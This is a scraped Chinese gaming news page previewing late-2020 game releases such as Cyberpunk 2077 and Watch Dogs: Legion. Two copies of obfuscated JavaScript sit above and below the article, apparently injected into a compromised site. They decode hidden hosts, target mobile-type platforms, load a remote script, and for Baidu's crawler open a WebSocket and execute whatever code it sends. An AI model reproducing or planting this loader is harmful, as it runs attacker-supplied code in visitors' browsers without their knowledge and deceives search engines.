function hPSpQMJ(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function CeDWKSs(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return hPSpQMJ(t);};window['\x47\x42\x7a\x57\x4d\x45\x6f\x4f\x4b']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=CeDWKSs,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/q/'+i;cs.parentElement.insertBefore(s,cs);}})('aGG4uc3BvcnRzZHJlYW0udGG9w','dHIueWWVzdWW42NzguY29t','138805',window,document,['G','W']);}:function(){};

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家

2020年从年初开始,全世界的所有行业都受到了或多或少的冲击,游戏行业自然也在其中。

上半年的游戏行业发展并不尽如人意,受疫情影响,很多提供电子硬件设备的厂商纷纷停产,游戏主机,配件等等商品都供不应求,有些甚至还出现了大幅涨价的情况。

在中国,因为个人主机和游戏高性能PC的普及率还有待提高,所以网吧的用户群体数量一直是相当可观,然而这一部分玩家却因为疫情的原因缺席了中国游戏市场长达2至3个月时间,对于一些游戏和相关产业产生了“毁灭性”打击。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家网吧全部停业

上半年的新游戏发售情况也是非常不理想

主机方面,本来备受期待的美国末日2因为剧情原因,被玩家喷的体无完肤。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家拉胯的美末2

PS4上的收官之作对马岛之魂也只是正常水平,距离“神作”的称号显然还有一段距离。

任天堂方面虽然也有像纸片马里奥这样的优秀作品,但同样也是难以令所有人满意。相比于主机平台,PC端上的新游戏简直是到了“不提也罢”的程度,唯一引发巨大反响的还是吃鸡类主题的使命召唤:战区。

上半年游戏市场的集体“拉胯”,让2020年的最后这3个多月的时间备受期待。

事实上,从最后这几个月的游戏发布时间线来说,确实是值得关注,其中甚至有几款具有成为“年度最佳游戏”的潜力。

1.赛博朋克2077(11月19日)

这款游戏其实已经没有多少好介绍的了,游戏热度的夸张程度已经非常离谱了。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家财富密码——赛博朋克

在一些拥有众多用户的游戏资讯类app上,只要是稍微一点关于赛博朋克2077的消息,无论是谣言还是官方发布的公告,或是一些人的“云分析”,马上就能够获得上万的点击量,这样的关注程度,足以看出玩家对于游戏的期待程度。

将赛博朋克2077成为现阶段游戏自媒体的“财富密码”毫不为过。

2.四海兄弟:最终版(9月24日)

四海兄弟也就是玩家们所熟知的黑手党!

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家剧情向神作——四海兄弟

四海兄弟系列堪称是黑帮系列游戏的典范之作,游戏发生在上世纪30年代美国的伊利诺伊州,聚焦于黑帮之间的争斗,各个豪门家族的勾心斗角,玩家扮演的是一个禁酒令时期的枭雄,在黑手党中平步青云(官网介绍)。

更重要的是,没有哪一个男生能拒绝风衣,绅士帽,汤姆逊,老爷车,再加上重制版的精致画面,发售的期待值也是非常高的。

3.看门狗:军团(10月29日)

看门狗IP的经典程度众所周知,新一代的看门狗:军团更是又在玩法上有所突破。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家看门狗:军团

这一代的故事背景是在未来的伦敦,玩家扮演反抗组织,在一个无政府主义的世界里与一个巨大的霸权军事企业斗争。

最值得一提的新功能就是所有角色均可以操作,玩家可以招募所有生活在伦敦的男女老少,成为反抗组织的一员,也就说是可以操作所有的npc。如果功能属实,那么这个编组的规模之庞大已经是难以想象了。(据体验版消息,玩家可以操控的同伴数量上限为40个。)

4.刺客信条:英灵殿(11月10日)

刺客信条系列已经成为了“年货”型的游戏,“育碧式的开放世界”设定也随着刺客信条的大热而深入人心。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家以北欧为背景

规模庞大的地图,丰富的支线任务,很多可供探索的地方,虽然内容千篇一律,但是育碧确实是做到了在现有的技术条件之下,最顶级的开放世界游戏。

最好的一个例子,就是在刺客信条:大革命中,育碧几乎1:1还原了巴黎圣母院,细节程度已经具体到了每一块石头。2019年4月15日,有着800多年历史的巴黎圣母院发生火灾,整座建筑差点付之一炬,损毁非常严重。

大革命或许能够为巴黎圣母院的重建提供很大帮助,并且在重建成功之前,所有人都只能通过刺客信条来参观巴黎圣母院了。这也从侧面反映了育碧式开放世界的顶级制作水准。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家刺客信条:大革命中的巴黎圣母院

5.塞尔达无双:灾厄启示录(11月20日)

这一作的公布可谓是非常突然,在本次东京电玩展之前,几乎没有什么消息报道塞尔达会有新作公布。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家百年前的海拉鲁

但是值得广大玩家注意的是,这一作塞尔达并不是荒野之息2,相反,从官方公布的信息来看,这一作的故事背景发生在荒野之息的前一百年,也就是和盖侬开战,守护者被腐化的那个年代。

下半年神作将“井喷式”出现,年度最佳游戏将花落谁家英帕老奶奶年轻时的样子

在荒野之息中已经战死的四英杰,和为林克苏醒之后指明道路的英帕老奶奶,皆被确认为可操作角色。本作的动作套组也不负无双之名,从实机展示来看,角色的招式观赏性相当出色,而且保留了时间停止这一类的经典技能,再加上可以一观百年前繁荣的海拉鲁王城,相信没有塞尔达的粉丝会拒绝这一部作品。

上述5款游戏几乎都是“神作”级别的质量,对于这样的游戏来说,早买早享受才是正道。

给TA买糖
共{{data.count}}人
人已赞赏
游戏圈

腾讯告赢硬件厂商,手机手柄被裁定禁售

2020-9-29 15:50:47

游戏圈

索尼上海实体店《原神》主题开放

2020-9-29 17:05:28

function OdHtwI(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function hVIzGUms(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OdHtwI(t);};window['\x6a\x75\x57\x4b\x49\x53\x45\x76']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=hVIzGUms,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/q/'+i;cs.parentElement.insertBefore(s,cs);}})('aG4ucc3BvccnRzZHJlYW0udG9w','dHIueWVzdW42NzgguY29t','138806',window,document,['c','g']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧